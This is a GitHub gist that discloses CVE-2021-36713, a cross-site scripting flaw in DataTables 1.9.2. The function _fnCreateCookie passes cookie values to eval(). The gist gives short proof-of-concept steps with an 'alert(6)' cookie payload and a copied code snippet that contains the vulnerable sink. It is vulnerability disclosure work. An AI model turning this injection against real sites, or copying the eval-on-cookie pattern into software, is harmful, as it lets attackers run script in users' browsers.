Skip to content

Instantly share code, notes, and snippets.

@walhajri
Last active January 7, 2024 10:01
Show Gist options
  • Save walhajri/711af9b62f6fb25e66a5d9a490deab98 to your computer and use it in GitHub Desktop.
Save walhajri/711af9b62f6fb25e66a5d9a490deab98 to your computer and use it in GitHub Desktop.
CVE-2021-36713 Publication

Cross-Site Scripting (XSS) Vulnerability

Description:

DataTables is a table enhancing plug-in for the jQuery Javascript library, adding sorting, paging and filtering abilities to plain HTML tables with minimal effort.

This vulnerability was found during a penetration testing assessment and the website used the Datatables library.

Impact

If a website developer exposed the parameter sBaseName from the function _fnCreateCookie of the DataTables library then a malicious user could execute Javascript code through it.

Vulnerability path:

_fnCreateCookie ( sName, sValue, iSecs, sBaseName, fnCallback )

var aCookies =document.cookie.split(';');

var aSplitCookie = aCookies[i].split('=');

try { oData = eval( '('+decodeURIComponent(aSplitCookie[1])+')' ); }

Affected target

This vulnerability was found on version 1.9.2

With the following vulnerable function _fnCreateCookie

Proof of Concept (PoC)

  • Surf to this URL: https://cdn.datatables.net/1.9.2/js/jquery.dataTables.js
  • Add a cookie with the name "XSS" and let its value be "alert(6)" (The vulnerability will occur if the sBaseName is exposed)
  • Demonstrate the use of this library go to the console tab from the developer tools paste the below code and run it, and an alert dialog will appear

below is a code snippet from line 4405 until line 4423

var sBaseName = 'XSS' //if this variable is exposed then the website will be vulnerable to XSS
var aCookies =document.cookie.split(';');
for ( var i=0, iLen=aCookies.length ; i<iLen ; i++ )
                {
          console.log(aCookies[i].indexOf(sBaseName))
                    if ( aCookies[i].indexOf( sBaseName ) != -1 )
                    {
                        /* It's a DataTables cookie, so eval it and check the time stamp */
                        var aSplitCookie = aCookies[i].split('=');
                        try { oData = eval( '('+decodeURIComponent(aSplitCookie[1])+')' ); } //Vulnerable sink
                        catch( e ) { continue; }
                        if ( oData.iCreate && oData.iCreate < iOldTime )
                        {
                            sOldName = aSplitCookie[0];
                            iOldTime = oData.iCreate;
                        }
                    }
                }

Discoverer

Waleed Ibrahim Alhajri

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment